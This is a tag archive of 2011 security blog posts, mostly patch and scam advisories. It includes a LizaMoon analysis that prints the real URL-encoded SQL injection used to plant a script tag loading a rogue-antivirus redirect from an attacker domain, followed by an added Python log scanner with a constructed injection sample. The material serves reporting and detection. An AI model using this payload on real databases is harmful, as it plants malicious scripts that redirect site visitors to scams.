Tag Archive | "Update"

Adobe updates Reader and Acrobat

A little earlier than announced, Adobe released updated versions of Adobe Acrobat and Reader. These programs were also vulnerable to the Flash Player zero-day vulnerability, which was already fixed last week. As the vulnerability is rated critical, users of Acrobat and Reader should download and install the updates as soon as possible.

The updated version for Adobe Reader is available in the Download Center. For Acrobat, the new releases are linked in the refreshed security advisory.

Dirk Knop
Technical Editor
techblog.avira.com

Posted in Avira | Comments Off

Silverlight Update Available, (Thu, Apr 21st)

Microsoft has issued a security patch for Silverlight KB2526954. It fixes several security issues. However, the Microsoft link to KB2526954 is still not live. If you have Microsoft update running, it is ready to install. This is rated as important and will auto install.

Direct download http://go.microsoft.com/fwlink/?LinkID=149156

[1] http://www.microsoft.com/getsilverlight/Get-Started/Install/Default.aspx

– Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Posted in Security | Comments Off

Flash Player Update available

Just a short notice on the now available Adobe Flash Player update: version 10.2.159.1 has been released, which fixes the critical security vulnerability that allows attackers to infect computers with malware just by luring victims onto hacked websites, for example. The update is available for Windows, Mac, Linux and Solaris in Adobe’s Download Center. Users and administrators should install the new version immediately!

Dirk Knop
Technical Editor
techblog.avira.com

Posted in Avira | Comments Off

Adobe plans Flash Player Update tomorrow

This is good news – for the recently acknowledged zero-day security vulnerability within Adobe Flash Player, Acrobat and Reader there will be a first update available tomorrow. Adobe updated their security advisory on that matter to reflect the update schedule – the Flash Player update fixing the vulnerability for Windows, Mac, Linux and Solaris will be available tomorrow, Friday, April 15.

For the also vulnerable Adobe Reader and Acrobat, updates are planned “no later than the week of April 25, 2011”. The only exception is Adobe Reader X for Windows, which will be updated on the regularly planned Patchday on June 14, as the integrated sandbox prevents successful exploitation there according to Adobe.

Please be prepared to download and install the update tomorrow as soon as it is available!

Dirk Knop
Technical Editor

Posted in Avira | Comments Off

Update on LizaMoon mass-injection and Q&A

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon.com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down.

 

 

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

 


 

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

 

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

 

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))–

 

More information is available over on Stackoverflow.com.
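
As an added example (not part of the original post), the following Python decodes char() chains like the one above from web-server access-log query strings and flags requests whose decoded text contains a script tag. The log lines, the example.invalid domain and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One T-SQL char(N)/nchar(N) call. The \b keeps "varchar(8000)" from matching.
CHAR_CALL = re.compile(r"\bn?char\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
# A run of such calls joined by "+", the T-SQL string concatenation operator.
CHAR_CHAIN = re.compile(
    r"\bn?char\s*\(\s*\d+\s*\)(?:\s*\+\s*n?char\s*\(\s*\d+\s*\))*",
    re.IGNORECASE)
# Client address and request target of a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_chain(chain):
    """Turn 'char(60)+char(47)' into the string it builds ('</')."""
    codes = [int(n) for n in CHAR_CALL.findall(chain)]
    return "".join(chr(n) if n <= 0x10FFFF else "\ufffd" for n in codes)


def deobfuscate(query):
    """URL-decode a query string and replace every char() chain with the
    literal it evaluates to. Returns (readable_sql, [(terms, text), ...])."""
    # unquote_plus turns '+' into a space and '%2B' into '+', which is the
    # order the payload relies on: '+' separates words, '%2B' concatenates.
    sql = unquote_plus(query)
    decoded = []

    def substitute(match):
        text = decode_chain(match.group(0))
        decoded.append((len(CHAR_CALL.findall(match.group(0))), text))
        return "'" + text.replace("'", "''") + "'"

    return CHAR_CHAIN.sub(substitute, sql), decoded


def scan(lines, min_terms=8):
    """Return one record per log line whose query string carries a long
    char() chain that decodes to text containing a script tag."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.match(line)
        if not match or "?" not in match.group(2):
            continue
        client, target = match.groups()
        readable, decoded = deobfuscate(target.split("?", 1)[1])
        # Short chains such as char(32) are common and not interesting alone.
        long_chains = [text for terms, text in decoded if terms >= min_terms]
        if any("<script" in text.lower() for text in long_chains):
            hits.append({"line": lineno, "client": client,
                         "injected": long_chains, "sql": readable})
    return hits


# Constructed sample log (documentation addresses, placeholder domain).
# Line 2 has the same statement shape as the example in the post.
INJECTION_LINE = (
    '203.0.113.7 - - [31/Mar/2011:10:02:11 +0000] "GET /news.asp?id=12'
    '+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast('
    'char(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)'
    '%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)'
    '%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(101)%2Bchar(120)%2Bchar(97)%2Bchar(109)%2Bchar(112)'
    '%2Bchar(108)%2Bchar(101)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(118)%2Bchar(97)%2Bchar(108)'
    '%2Bchar(105)%2Bchar(100)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)'
    '%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)'
    '%2Bchar(112)%2Bchar(116)%2Bchar(62)'
    '+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- HTTP/1.1" 200 512'
)
SAMPLE_LOG = [
    '198.51.100.20 - - [31/Mar/2011:09:58:40 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    INJECTION_LINE,
    # Benign request that happens to mention char(); a single term is ignored.
    '198.51.100.21 - - [31/Mar/2011:10:05:03 +0000] "GET /search.asp?q=char(65)+in+sql HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']}: {hit['injected']}")
        print("  decoded statement:", hit["sql"])
```

Only query strings are covered here; POST bodies do not normally appear in access logs, so an injection delivered that way needs request-body logging or database-side inspection to find.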

 

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

 

What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

 

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

 

 

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

 

 

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.

So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

 

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

 

Questions & Answers about the LizaMoon mass-injection

 

Q: Why is this called LizaMoon?
A: The first domain we saw on March 29, 2011 was called lizamoon.com

 

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

 

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. So far we have only had reports of Microsoft SQL Server 2003 and 2005 being affected, so if you have any information that says that 2008 has been hit as well, we'd like to know about it.

 

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: We don't know, but we don't think so. Most likely there are vulnerabilities in the Web systems used by these sites, such as outdated CMS and blog systems.

 

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

 

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

 

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

 

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

 


 

Posted in Malware | Comments Off

Improve your Security #4: Update your Software often

Every week or even day we see new vulnerabilities popping up in all software packages which we use daily: In the operating system (Windows, Mac, Linux), PDF Readers, Web browsers, Mail clients, Office suites, and so on. It is critical to install the available updates for all these software packages in order to not become a victim of malware and online fraudsters.

A neighbour of mine without any IT knowledge asked me some time ago why she should update her programs when everything works perfectly for her and she doesn’t need other features from that software? She was using her rather old laptop running Windows 95 only for casual browsing and basic email communication. She didn’t have an antivirus solution installed because it was slowing down the laptop significantly. IE6, Outlook Express and Notepad were everything she ever needed and used. She never heard of Facebook, Twitter, instant messaging or drive-by-downloads.

When I am confronted with such a situation where it doesn’t make any sense to explain the dangers of the online world, I try to use simple terms and analogies which everybody can understand. Imagine that your computer is like a house in which you have your goods and where you live. Of course, just like everybody else, you want to feel comfortable and secure in your house, you want privacy and make sure that no one can steal your goods when you are not at home.

Our house
For comfort, a house needs basic facilities like water, electricity and gas. You may also want to have certain commodities like TV with cable network, a telephone and an Internet connection. For security and privacy, the house needs walls, doors and windows with locks. Depending on where you live – for example in a village or a big city where the crime rate is higher – you may want to install a burglar alarm to secure your windows and doors. If you live in a country where the winter is very cold, you may want to insulate the walls in order to keep the heat inside.

Just like a house, the computer also needs some basic components to function correctly and you need some additional elements to give you comfort when using the computer. These basic components are the operating system (Windows, Mac, and so on) with all its elements (drivers, programs) and your commodities are for example a web browser, a document reader, an email client and an office suite.

If you restrict yourself to the basics, never exchange or receive documents with and from the external world, you can compare your computer with a house with minimal facilities or a hut. I doubt that these days this is a real use case for anyone. Assuming that you are just like the rest of us who need a computer with an Internet connection, then the situation looks different.

When you are on the Internet, it is just like you have a house in the middle of a big city. Can you imagine it without doors, windows (with blinds) and locks? Of course not, otherwise it would be like a public domain and you wouldn’t have any privacy and security.

So, you need some security elements. For a computer this means that it needs some kind of security software which keeps strangers away from your information. But a software which has problems (like security vulnerabilities) is the equivalent of a house which has doors and windows but the locks are damaged, thus allowing unrestricted access for everyone. In a house one can enter through the main door, basement, windows or a balcony. These elements which can grant access must be closed or locked in order to guarantee you security and privacy. Exactly like in a house, in a computer there are many ways to get access. A vulnerable operating system or program can be like the basement door left open or even closed but unlocked, no matter if the main door has the latest generation of security system.

This is why it is important to have everything secured, or in a computer, updated to the latest version. A security software is like having a security system installed on the main door and windows. Depending on the type of security software, it can make sure that nobody enters on the basement door or other doors. It might even tell you that some locks in the house are damaged and that they should be replaced. Like in an intelligent house, it could even order the replacements for you and call a technician to install them. For example, this is what an update service does for the software on your computer; it downloads and installs the required software for you.

To close the story with my neighbour, I managed to install the Avira AntiVir Personal edition, scheduled Windows to update itself automatically every day, and installed Firefox and Thunderbird as default Web and Mail clients instead of IE6 and Outlook Express. I also created a free account with an online backup provider and scheduled a synchronization with the cloud every day. This way, her documents were also safe (she didn’t have an external hard drive for backup).

The old laptop of my neighbour wasn’t working significantly slower than before, but now it was like an old house which got renovated: It looks good and it is comfortable, it is secure and provides privacy, but from time to time you hear the floor or the walls making strange noises because the components are old.

With a little help
On a side note, there are various free software solutions which can help identify the applications which need updates because of known security vulnerabilities. Perhaps the best known is Secunia Online Software Inspector (OSI) and its equivalent for installing on the PC called Secunia Personal Software Inspector (PSI).

More hints about securing your own computer, networks and privacy can be found in the other articles of the “Improve your Security” series:
Improve your Security #1: Complex passwords aren’t always better
Improve your Security #2: Securing your notebook
Improve your Security #3: Online Protection

Sorin Mustaca
Data Security Expert

Posted in Avira | Comments (1)

Steer clear of “Profile Update” Facebook application

Let’s take a look at the latest in a long line of fake stalker apps on Facebook.

This one is called “Profile Update”, and makes a number of claims in relation to tracking visitors while changing your profile background. “Change your background and see your stalkers”, they claim – installing their update will let you see who is stalking you.



If you agree to their terms of service (which are rather long and mention Singapore as being the base of operations for this one) you’ll be prompted to install the rogue application when logging in, giving access to your basic information, granting wall posting rights and letting it “access your data anytime”.



You’ll also be prompted to fill in the inevitable survey, which randomly decides to talk about “Profile Peekers 2.0” instead of “Profile Update”. It’s almost like they’re making it up as they go along.



While you’re busy signing your life away to coupons, fruit snack offers and fabric conditioner trials your wall will start to look like this:



Before the police come and take me away for questioning, I should mention that some of the URLs involved are foksrox21(dot)info and wurstbrota(dot)info. Please don’t be fooled by these stalker apps – scams such as these have been around since the days of Myspace, and they didn’t work then either. Wurstbrota is still live, but the foxrox URL currently redirects to a Formspring page. The rogue application seems to be currently unavailable too, so hopefully this is in the process of being shut down.

Christopher Boyd

Posted in Facebook, GFI Software | Comments Off

The next Browser Update: Safari

Right after the Mozilla developers and Google released new web browser versions to fix plenty of security vulnerabilities, Apple now fixes at least 62 vulnerabilities in the Safari web browser 5.0.4. A little late though, as the CanSecWest conference is already running in Vancouver – and Safari on Mac OS X was the first combo to fall victim to successful hacking attempts.

As these are quite obviously critical security updates, users and administrators should install them as soon as possible! The updates are offered via the automatic update, but can also be downloaded manually from Apple’s website.

Also, Apple is shipping iOS 4.3 earlier than previously announced – it was expected later tomorrow. Next to interesting features such as an integrated WiFi hotspot, iOS 4.3 also contains the security fixes in the web browser. Thus iPhone, iPad and iPod Touch users should connect their devices to their main computer and fire up iTunes to install the most recent iOS version, too!

Dirk Knop
Technical Editor

Posted in Avira | Comments Off

Microsoft update for restricting the USB Autorun

Microsoft has released an “important, non-security update” (KB971029) that restricts Autorun entries in the AutoPlay dialog to only CD and DVD drives.

This update applies to Windows XP/Vista/non-Windows 7.

Applying this update will help curb malware that uses the Autorun feature, as mentioned in this blog.

We highly recommend that users visit the site below and apply the patch urgently.
http://support.microsoft.com/?kbid=971029

Microsoft’s Tuesday patch also contains fixes for vulnerabilities in the Windows Graphics Rendering Engine, as well as a CSS exploit in Internet Explorer that could allow an attacker to gain remote code execution.

We ask all users to keep their systems up to date.

Posted in Quick Heal | Comments Off


Windows Phone 7 update bricks some handsets – Microsoft in security middle ground

Microsoft tried to push an update to their newly released Windows Phone 7 this week and accidentally bricked some Samsung-branded handsets.

Microsoft has since pulled the update, but only for the Samsung Omnia handsets affected by the flaw. Even more embarrassing, the update was intended to improve the updating process and provided no enhancements for users of the phones.

If you have one of the affected devices, there are experimental instructions on how to recover your phone.

Microsoft has elected to centrally control the distribution of updates for the Windows Phone 7 platform, which ultimately puts them in a sort of middle ground. After an accident like this one, carriers may begin applying pressure on Microsoft to let them decide if and when handsets receive updates.

Why does this matter? Well, the smartphone landscape is quite diverse when it comes to how much control phone and operating system manufacturers have compared to the carriers.

At one end of the spectrum we have Apple and Research In Motion, the manufacturer of the BlackBerry devices. Both companies centrally control all software and updates they provide for their phones, and no one else produces the handsets. This enables a very rigorous QA process to find defects and allows Apple and RIM to ship fixes and updates to improve security on a more regular basis.

At the other end of the spectrum is the Android platform from Google. While Google produces what you might call a “reference design” OS, it is up to the manufacturers to customize and test it on their devices. There are many different companies producing Android phones for many different carriers.

Not only is the OS somewhat unique per device, but carriers are also producing their own customizations, further diversifying the variants of Android in the field.

This can be a real problem. When you need security updates, you must rely on Google to fix the bug, your device manufacturer to patch their custom OS, and your carrier to decide that they are willing to provide you with the fix. This is a huge security mess.

Microsoft has chosen a path right down the middle. Like Google, they are not producing handsets, but they are trying to create a centrally distributed operating system platform that they control.

From a security perspective this appears to be a solid approach, allowing Microsoft to ensure devices in the field are all able to consume patches when they make them available, but it does come with risk.

Because Microsoft is placing the burden of their software SNAFU on the carriers and manufacturers, I expect we’ll see a backlash against their preferred updating method. This incident could not have come at a worse time for them, as they are trying to enter a very competitive smartphone market in which any bad press could push consumers to better established brands.

For the latest information on the threats facing mobile users, check out our latest threat report.

Creative Commons image of phone brick courtesy of Riekus’s Flickr photostream.

Posted in Sophos | Comments Off

Kaspersky update servers unreachable , (Mon, Feb 21st)

In a forum Kaspersky users discussed being unable to update their anti-virus product. The posting entitled ‘Problem with the bases, Cannot update databases with 2011′ is here: http://forum.kaspersky.com/index.php?showtopic=201405. It appears as though the issue has not yet been fully resolved. Thanks Bill for letting us know.
Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Security | Comments Off

Critical Java Update and a new Windows Vulnerability

Multiple security vulnerabilities have been found within the current Java runtime environments, both for client computers and for servers. These allow attackers to infect computers, for example with a Trojan, just by luring victims into visiting manipulated websites. Oracle has now released updated software which users and administrators should install as soon as possible! Security holes in outdated Java versions get exploited very often on the Internet, thus updating minimizes the attack surface for cyber criminals.

In Windows operating systems – currently verified are Windows XP SP3 and Windows Server 2003 SP2 – a new security vulnerability has been found. It allows an attacker to take over a Windows PC which has network shares enabled. A patch has not been released yet. Especially in public places, the firewall should be configured to block the TCP and UDP ports 138, 139 and 445, respectively, or Windows file sharing should be disabled until a patch is available.

Dirk Knop
Technical Editor

Posted in Avira | Comments Off

Oracle Java 6 Update 24, (Tue, Feb 15th)

Oracle has released a new update for Java environment, it contains fixes for security issues. Time to get your Java environment up to date again.
The details on this update can be found at http://www.oracle.com/technetwork/java/javase/6u24releasenotes-307697.html
Happy Java Patching!

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Security | Comments Off

Update: WhoAmI? Version 0.1.5

I’ve updated my WhoAmI? Firefox add-on for Firefox version 4.

You can get it from the Mozilla site.

Posted in Security | Comments Off

Chrome Gets Shinier: Google Browser Tightens Security Screws

Google has updated its Chrome Web browser and fixed nine of the browser’s security vulnerabilities in the process.

The updated Chrome version 9 was rolled out last week, and includes patches for nine defects, including faulty PDF software and secure sockets layer (SSL) libraries that left Chrome open to cyberattack.

The Chrome update also addressed an error in the browser’s audio handling program that could have allowed a hacker to escape Chrome’s built-in sandbox technology, a feature that isolates computer infections and prevents them from spreading, according to Computerworld.

Chrome’s quick fix comes at a good time for Google, who announced it would pay $20,000 to anyone who could hack into Chrome at next month’s CanSecWest conference.

To automatically update Chrome, users can go to the wrench icon in the browser’s upper right corner and select “About Google Chrome.” Chrome will check for security updates and inform you if any are available.

© 2011 SecurityNewsDaily. All rights reserved.

Posted in Security | Comments Off


Restrict USB Autorun: Update for Windows (KB971029)

Among yesterday’s optional software updates from Microsoft was Update for Windows XP/Vista/non-Windows 7 (KB971029).


It’s an “important, non-security update” that restricts “AutoRun entries in the AutoPlay dialog to only CD and DVD drives”.

Excellent. This could really help curb AutoRun worms. If you’re using an older Windows computer, we highly recommend you go and apply this optional update.

You’ll need to visit update.microsoft.com and select “Custom” updates.


And you’ll find KB971029 in the “Software, Optional” category.


This update restricts USB AutoRun functionality in the AutoPlay dialog. You may also wish to take further steps and disable AutoPlay completely. See here and here for posts on that topic.


On 09/02/11 At 01:13 PM

Posted in Security | Comments Off

Snort 2.9.0.4 is coming out Thursday, ClamAV 0.97 update released, (Tue, Feb 8th)

While this post may be a bit self-serving, as Snort is made by the company that I work for (Sourcefire, in the interest of full disclosure), since Snort is a rather large piece of security software, I thought I’d point to a blog post that I put up on the Snort.org blog about the release of Snort 2.9.0.4, which is being released this Thursday.
Check out the Snort 2.9.0.4 blog post here.
ClamAV was also updated this week to version 0.97, and since this is a rather large piece of security software as well, I thought I’d point to the blog post that I wrote about the ClamAV 0.97 update the other day.
Thanks all.
– Joel Esler | http://blog.snort.org | http://blog.joelesler.net

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted in Security | Comments Off


Safer Internet (Update) Day

February 8th is Safer Internet Day, a day devoted to making the Internet a better place for children. And before your child goes online… make sure their computer is up to date with secure software. There are lots of updates and patches to install this month.

Microsoft’s Security Bulletin includes a critical update for Internet Explorer that affects all versions of IE.


Note that the least affected OS is Windows XP Service Pack 3. That’s because Service Pack 2 was retired from the update cycle last year. Children are often provided “hand-me-down” computers. Before giving a child old hardware, make sure the current service pack is installed. You should also consider an alternative browser.

But then again, alternatives aren’t worry free either.

Google recently patched Chrome to version 9.0.597.84.

VLC media player, another popular alternative, has a flaw when parsing an invalid MKV file that could allow a malicious attacker to trigger an execution of arbitrary code. VLC media player 1.1.7 addresses this issue, so either update, or avoid untrusted downloads (and sites if you have the VLC plugin installed).

Adobe is also publishing an update today for Adobe Reader and Acrobat. Affected versions include Adobe Reader X (10.0) and earlier versions for both Windows and Macintosh.

On 08/02/11 At 04:46 PM

Posted in Security | Comments Off

Update: Researchers unsure why Adobe Reader X spoiled new PDF attack

Adobe’s Reader X, last year’s upgrade that features a “sandbox” designed to protect users from PDF exploits, stymied a recent attack campaign, researchers said.

Full story: Network World on Security

Posted in Security | Comments Off

Another Stuxnet Resources Update

[Update: The Reuters article flagged on 6th February 2011 refers to a statement by the Russian ambassador to NATO claiming that Stuxnet could have caused "another Chernobyl": more info at http://www.csoonline.com/article/659165/stuxnet-could-have-caused-new-chernobyl-russian-ambassador-says?source=rss_data_protection. Hat tip to @FSecure.]
Tip of the hat to Gary Mauvais for alerting me to an article by Nima Bagheri, CEO of U0vd: The Art of … Read More.

Full story: ESET ThreatBlog

Posted in Antivirus | Comments Off

Anatomy of a Biting Bunny – The Infected Microsoft Catalog Update

Aryeh Goretsky posted a blog about a trojan program in a Microsoft catalog update. I thought it might be a little interesting to know how this can happen and why it doesn’t happen more often.
As it turns out, it was once my job to make sure that Microsoft did not release infected software. Initially my … Read More.

Full story: ESET ThreatBlog

Posted in Antivirus | Comments Off


SW Adobe to Update Reader and Acrobat on Patch Tuesday

Next Tuesday, on their regularly-scheduled quarterly Acrobat Patch Tuesday, Adobe will release security updates for all Windows and Mac Acrobat and Reader versions. Updates for the UNIX version are expected by the week of February 28, 2011.

Adobe committed about a year ago to a regular update cycle like Microsoft’s. It’s not often that they have been able to keep to it, as many of their updates have been urgent enough for them to go “out of band.”



Full story: Security Watch

Posted in Security | Comments Off


Update to Windows Home Server Includes Security Fixes

Update Release 2 for WHS v1 has been released to Windows Update by Microsoft. It includes 8 fixes found since the last major update in August of last year.

2 of the fixes relate to security, although details are nonexistent and no security bulletin has been released on them:

Issue 6: The current version of Identity Client Run Time Library that is included in Windows Home Server contains a potential privacy issue.
Issue 8: The Remote Access website may be vulnerable to cross-site request forgery attacks.

If you run Windows Home Server and are set for Automatic Updates you should see it available. Since the update requires a reboot to install, it may not have installed, so it’s worth a check.



Full story: Security Watch

Posted in Security | Comments Off


RealPlayer Security Update Released [Update]

RealNetworks has announced in their blog that a security update to all versions of Windows RealPlayer has been released.

The vulnerability is of “High” severity and affects only the Windows version of RealPlayer. Mac, Linux, and RealPlayer Enterprise products are not affected.



Full story: Security Watch

Posted in Security | Comments Off
